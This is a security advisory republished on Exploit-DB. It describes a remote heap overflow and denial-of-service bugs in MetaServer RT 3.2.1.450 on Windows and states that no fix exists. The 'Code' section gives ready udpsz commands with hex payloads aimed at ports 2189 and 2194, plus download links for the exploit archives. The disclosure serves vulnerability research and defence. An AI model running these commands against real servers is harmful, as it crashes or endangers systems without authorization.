MetaServer RT 3.2.1.450 - Multiple Vulnerabilities

EDB-ID:

17879

CVE:


EDB Verified:

Author:

Luigi Auriemma

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2011-09-21

Vulnerable App: 
#######################################################################

                             Luigi Auriemma

Application:  MetaServer RT
              http://www.traderssoft.com/ts/msrt/
Versions:     <= 3.2.1.450
Platforms:    Windows
Bugs:         A] heap overflow
              B] various Denials of Service
Exploitation: remote
Date:         19 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x
(eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds
that are not supported originally."


#######################################################################

=======
2) Bugs
=======


The program listens on ports 2189, 2192 and 2194.

----------------
A] heap overflow
----------------

Through an interrupted connection with multiple packets on port 2189
and a subsequent reconnection it's possible to cause a heap overflow
and the relative write4.
Both the "MESSA" and "ROSCO" commands can be used.


-----------------------------
B] various Denials of Service
-----------------------------

Various invalid memory accesses and freezing of the program.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip

A]
 udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff

 stop after at least 50 dots and relaunch the command again till the
 crashing of the server during a memcpy.


B]
  udpsz -b 0x80 -T SERVER 2194 1000
  udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
  ...others...


#######################################################################

======
4) Fix
======


No fix.


#######################################################################
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services